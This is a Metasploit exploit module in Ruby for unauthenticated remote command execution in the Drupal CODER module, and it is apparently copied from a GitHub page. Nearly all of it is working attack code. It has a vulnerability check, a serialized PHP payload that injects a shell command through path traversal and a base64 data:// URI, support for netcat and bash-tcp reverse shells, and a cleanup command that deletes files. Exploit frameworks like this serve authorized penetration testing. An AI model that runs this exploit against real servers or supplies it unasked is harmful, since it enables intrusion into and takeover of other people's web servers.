Permalink
Cannot retrieve contributors at this time
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = ExcellentRanking | |
| include Msf::Exploit::Remote::HttpClient | |
| def initialize(info={}) | |
| super(update_info(info, | |
| 'Name' => 'Drupal CODER Module Remote Command Execution', | |
| 'Description' => %q{ | |
| This module exploits a Remote Command Execution vulnerability in the | |
| Drupal CODER Module. Unauthenticated users can execute arbitrary | |
| commands under the context of the web server user. | |
| The CODER module doesn't sufficiently validate user inputs in a script | |
| file that has the PHP extension. A malicious unauthenticated user can | |
| make requests directly to this file to execute arbitrary commands. | |
| The module does not need to be enabled for this to be exploited. | |
| This module was tested against CODER 2.5 with Drupal 7.5 installed on | |
| Ubuntu Server. | |
| }, | |
| 'License' => MSF_LICENSE, | |
| 'Author' => | |
| [ | |
| 'Nicky Bloor <nick@nickbloor.co.uk>', # discovery | |
| 'Mehmet Ince <mehmet@mehmetince.net>' # msf module | |
| ], | |
| 'References' => | |
| [ | |
| ['URL', 'https://www.drupal.org/node/2765575'] | |
| ], | |
| 'Privileged' => false, | |
| 'Payload' => | |
| { | |
| 'Space' => 250, | |
| 'DisableNops' => true, | |
| 'BadChars' => "\x2f", | |
| 'Compat' => | |
| { | |
| 'PayloadType' => 'cmd cmd_bash', | |
| 'RequiredCmd' => 'generic netcat netcat-e bash-tcp' | |
| }, | |
| }, | |
| 'Platform' => ['unix'], | |
| 'Arch' => ARCH_CMD, | |
| 'Targets' => [ ['Automatic', {}] ], | |
| 'DisclosureDate' => '2016-07-13', | |
| 'DefaultTarget' => 0 | |
| )) | |
| register_options( | |
| [ | |
| OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']) | |
| ] | |
| ) | |
| self.needs_cleanup = true | |
| end | |
| def check | |
| res = send_request_cgi( | |
| 'method' => 'GET', | |
| 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), | |
| ) | |
| if res && res.body.include?('file parameter is not setNo path to parameter file') | |
| Exploit::CheckCode::Appears | |
| else | |
| Exploit::CheckCode::Safe | |
| end | |
| end | |
| def exploit | |
| p = '' | |
| p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}' | |
| p << 's:11:"theme_cache";s:16:"theme_cache_test";' | |
| p << 's:9:"variables";s:14:"variables_test";' | |
| p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}' | |
| p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}' | |
| p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";' | |
| p << 's:7:"new_dir";s:' | |
| p << (payload.encoded.length + 5).to_s | |
| p << ':"-v;' | |
| p << payload.encoded | |
| p << ' #";s:4:"name";s:4:"test";}}}' | |
| pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}" | |
| send_request_cgi( | |
| 'method' => 'GET', | |
| 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), | |
| 'encode_params' => false, | |
| 'vars_get' => { | |
| 'file' => pl | |
| } | |
| ) | |
| end | |
| # XXX: FileDropper can't handle weird filenames | |
| def on_new_session(session) | |
| # This find command should be decently portable... | |
| command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete' | |
| print_status("Cleaning up: #{command}") | |
| session.shell_command_token(command) | |
| end | |
| end |